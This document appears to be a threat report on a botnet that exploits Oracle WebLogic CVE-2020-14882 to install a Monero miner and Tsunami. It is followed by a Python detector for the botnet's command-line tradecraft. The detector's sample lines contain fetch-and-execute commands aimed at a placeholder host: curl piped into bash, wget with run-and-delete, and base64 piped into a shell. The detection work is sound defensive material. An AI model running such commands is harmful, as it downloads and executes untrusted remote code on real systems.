A botnet has been detected that propagates using a WebLogic exploit. It carries two payloads: 1) Monero (XMR) miner binaries and 2) Tsunami binaries. The botnet primarily targets cloud servers. In September, an earlier version of the botnet exploited misconfigured Docker APIs. Interestingly, the current version contains unused code for exploiting Redis and for brute-forcing SSH. The botnet achieves persistence in multiple ways; it kills running processes (potentially competing mining tools) and eliminates EDR tooling. It uses base64-encoded intermediate-stage shell scripts and base64-encoded commands to download and execute Python scripts. Tsunami is added as a second payload, in addition to the Monero XMR miner.
It makes use of the Oracle WebLogic RCE exploit CVE-2020-14882. The campaign uses multiple shell scripts and Python scripts with different drop locations, and connects to binary-hosting web servers using hard-coded IP addresses and domains.
Stage 1 executes two payloads: a shell script, xms, and a Python script. The xms shell script is fetched with curl and piped directly into bash; if that fails, it is fetched with wget, executed, and then removed to hinder analysis. The Python script is fetched and executed using base64-encoded commands to evade detection and analysis. The xms shell script attempts to infect hosts that the server has previously connected to. It also lists running processes to gather information about active SSH connections. The XMR miner also targets Windows servers, as evidenced by the presence of .exe binaries on the same FTP server.
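The stages described above (curl piped straight into bash with a wget fallback, fetch-execute-remove of a dropped file, and base64-encoded intermediate commands that hide the real download) all leave recognisable traces in process or shell command-line telemetry. The following Python detector is an added example written for this page, not code from the report or from the botnet itself. It runs over constructed sample audit lines (the 198.51.100.7 address, file names and the encoded strings are placeholders built inline) and recursively decodes base64 blobs, so a stage that is only visible after decoding still raises a finding.

```python
import base64
import binascii
import re

# Command-line patterns that correspond to the tradecraft described in the report.
PATTERNS = {
    # download tool whose output is piped straight into a shell (curl ... | bash)
    "pipe_to_shell": re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b"),
    # base64 decoding whose result is piped into a shell (echo <b64> | base64 -d | bash)
    "base64_decoded_exec": re.compile(r"\bbase64\s+(?:-d|--decode)\b\s*\|\s*(?:ba)?sh\b"),
    # python one-liner that decodes an embedded base64 string before running it
    "python_inline_b64_exec": re.compile(r"\bpython[23]?\s+-c\b.*\bb64decode\b"),
}
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b")
# rm -f <path>; the path is cut at shell separators so "rm -f /tmp/x)" yields "/tmp/x"
RM_RE = re.compile(r"\brm\s+-[a-zA-Z]*f[a-zA-Z]*\s+([^\s;)&|]+)")
# candidate base64 blobs: long runs of the base64 alphabet with optional padding
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(text):
    """Return every base64 blob in text that decodes to printable UTF-8."""
    decoded_blobs = []
    for match in B64_BLOB_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            decoded = raw.decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            decoded_blobs.append(decoded)
    return decoded_blobs


def analyze(line, depth=0, max_depth=3):
    """Return the list of detection tags raised by one command line.

    Findings inside decoded base64 blobs are prefixed with "decoded:" so an
    analyst can see that the pattern was hidden behind an encoding layer.
    """
    tags = [name for name, rx in PATTERNS.items() if rx.search(line)]
    # fetch-execute-remove: a download tool plus rm -f of a path seen earlier in the line
    if DOWNLOAD_RE.search(line):
        for match in RM_RE.finditer(line):
            if match.group(1) in line[: match.start()]:
                tags.append("fetch_exec_remove")
                break
    # recurse into base64 payloads to catch encoded intermediate stages
    if depth < max_depth:
        for decoded in decode_blobs(line):
            tags.extend("decoded:" + t for t in analyze(decoded, depth + 1, max_depth))
    return tags


def scan(lines):
    """Return {line: tags} for every line that raised at least one tag."""
    return {line: analyze(line) for line in lines if analyze(line)}


# Constructed sample audit lines (not from the report). The host and paths are placeholders.
_HOST = "http://198.51.100.7"
_ENCODED_STAGE = base64.b64encode(f"curl -fsSL {_HOST}/x.sh | bash".encode()).decode()
_ENCODED_PY = base64.b64encode(b"print('stage two')").decode()
SAMPLE_LINES = [
    "cmd=apt-get update",
    f"cmd=curl -fsSL {_HOST}/xms | bash || (wget -q {_HOST}/xms -O /tmp/xms; bash /tmp/xms; rm -f /tmp/xms)",
    f"cmd=echo {_ENCODED_STAGE} | base64 -d | bash",
    f"cmd=wget -q -O /tmp/.x {_HOST}/bin && chmod +x /tmp/.x && /tmp/.x && rm -f /tmp/.x",
    f"cmd=python3 -c \"import base64;exec(base64.b64decode('{_ENCODED_PY}'))\"",
]

if __name__ == "__main__":
    for line, tags in scan(SAMPLE_LINES).items():
        print(", ".join(tags), "<-", line)
```

The tags are deliberately coarse: `pipe_to_shell` alone is common in legitimate installers, so in practice the value is in correlating several tags on one host or one process tree (a decoded stage that itself pipes to a shell, followed by a fetch-execute-remove) rather than alerting on any single match.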